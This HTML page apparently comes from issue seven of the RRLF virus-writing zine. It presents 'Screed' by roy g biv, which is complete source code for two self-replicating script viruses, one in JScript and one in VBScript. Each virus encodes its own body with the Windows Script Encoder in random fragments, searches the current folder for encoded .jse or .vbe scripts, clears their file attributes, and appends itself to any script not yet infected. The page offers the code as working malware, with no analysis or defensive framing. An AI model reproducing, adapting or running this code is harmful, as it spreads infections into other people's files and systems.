<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta http-equiv="Content-Script-Type" content="text/javascript">
<title>RRLF ZINE ISSUE SEVEN   -   SOURCES</title>
<link rel="stylesheet" type="text/css" href="../css/Style.css">
<script src="../js/Preload.js" language="javascript" type="text/javascript"></script>
<script src="../js/Hover.js" language="javascript" type="text/javascript"></script>
</head>

<body>
<table cellpadding="0" cellspacing="0" border="0">
 <tr><td>
 <table align="left" cellpadding="0" cellspacing="0" border="0">
  <tr>
   <td rowspan="3"><a href="../html/editorial.htm"><img src="../images/Top_01.jpg" alt="" border="0"></a></td>
   <td colspan="6"><img src="../images/Top_02.jpg" alt="" border="0"></td>
  </tr>
  <tr>
   <td><a href="../html/articles.htm"><img src="../images/Top_Articles_Out.jpg" alt="" border="0" id="articles" onMouseOver="ArticlesOver(1)" onMouseOut="ArticlesOver(0)"></a></td>
   <td rowspan="2"><img src="../images/Top_03.jpg" alt="" border="0"></td>
   <td><a href="../html/sources.htm"><img src="../images/Top_Sources_Out.jpg" alt="" border="0" id="sources" onMouseOver="SourcesOver(1)" onMouseOut="SourcesOver(0)"></a></td>
   <td rowspan="2"><img src="../images/Top_04.jpg" alt="" border="0"></td>
   <td><a href="../html/art.htm"><img src="../images/Top_Art_Out.jpg" alt="" border="0" id="art" onMouseOver="ArtOver(1)" onMouseOut="ArtOver(0)"></a></td>
   <td rowspan="2"><img src="../images/Top_05.jpg" alt="" border="0"></td>
  </tr>
  <tr>
   <td><img src="../images/Top_06.jpg" alt="" border="0"></td>
   <td><img src="../images/Top_07.jpg" alt="" border="0"></td>
   <td><img src="../images/Top_08.jpg" alt="" border="0"></td>
  </tr>
 </table>
 </td></tr>
 <tr><td>
  <br>
  <div class="title" align="left">Screed</div>
  <div class="title_by" align="left">by roy g biv</div>
  <br><a href="Screed" target="_blank" class="l">See also the project folder</a><br><br>
  <pre>
JS:
  
a="\"";b="b=Ga=String.fromCharCode(34);b=G+a+b+a+G;eval(b.replace(new RegExp(String.fromCharCode(71),G+a+GgG+a+G),a))G;c=ActiveXObject;d=Gscripting.G;e=GG;with(Math){random(1);f=0;while(f&lt;b.length){e+=new c(d+GencoderG).encodescriptfile(G.jsG,b.substr(f,g=round(random()*3)+1),0,0);e=e.substr(0,e.length-1)+b.substr(f+=g,h=round(random()*3));f+=h}}f=new c(d+GfilesystemobjectG);with(new Enumerator(f.getfolder(G.G).files))for(;!atEnd();moveNext())if(f.getextensionname(g=item()).toLowerCase()==GjseG)try{h=g.attributes;g.attributes=0;if(f.opentextfile(g).readall().search(/#@~/)&lt;0)f.opentextfile(g,8).write(String.fromCharCode(10)+e);g.attributes=h}catch(z){}//Screed - roy g biv 02/03/06";eval(b.replace(/G/g,a))

VBS:

a=chr(34):b="b=Ga=chr(34):b=G+a+b+a+G:execute(replace(b,chr(71),a))G:c=Gscripting.G:d=GG:randomize:e=1:while e&lt;=len(b):f=int(rnd()*3)+1:d=d+createobject(c+GencoderG).encodescriptfile(G.jsG,mid(b,e,f),0,0):g=int(rnd()*3):d=left(d,len(d)-1)+mid(b,e+f,g):e=e+f+g:wend:on error resume next:set e=createobject(c+GfilesystemobjectG):for each f in e.getfolder(G.G).files:if lcase(e.getextensionname(f))=GvbeGthen:g=f.attributes:f.attributes=0:if instr(e.opentextfile(f).readall,G#@~G)=0then e.opentextfile(f,8).write vbcrlf+d:end if:f.attributes=g:end if:next'Screed - roy g biv 02/03/06":execute(replace(b,"G",a))


  </pre>
  <br>
 </td></tr>
 </table>
</body>
</html>